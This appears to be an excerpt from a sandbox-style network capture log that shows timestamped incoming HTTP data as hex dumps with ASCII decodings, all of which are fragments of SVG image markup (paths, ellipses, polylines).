                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2217INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                                    Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2233INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                                    Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2249INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                                    Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2265INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                                    Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2281INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                                    Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2297INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                                    Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2313INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2329INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                                    Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2345INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2361INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                                    Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2377INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                    Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2393INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                                    Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2409INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                                    Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2425INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                                    Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2441INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                    Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2457INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                                    Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2473INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                                    Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2489INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 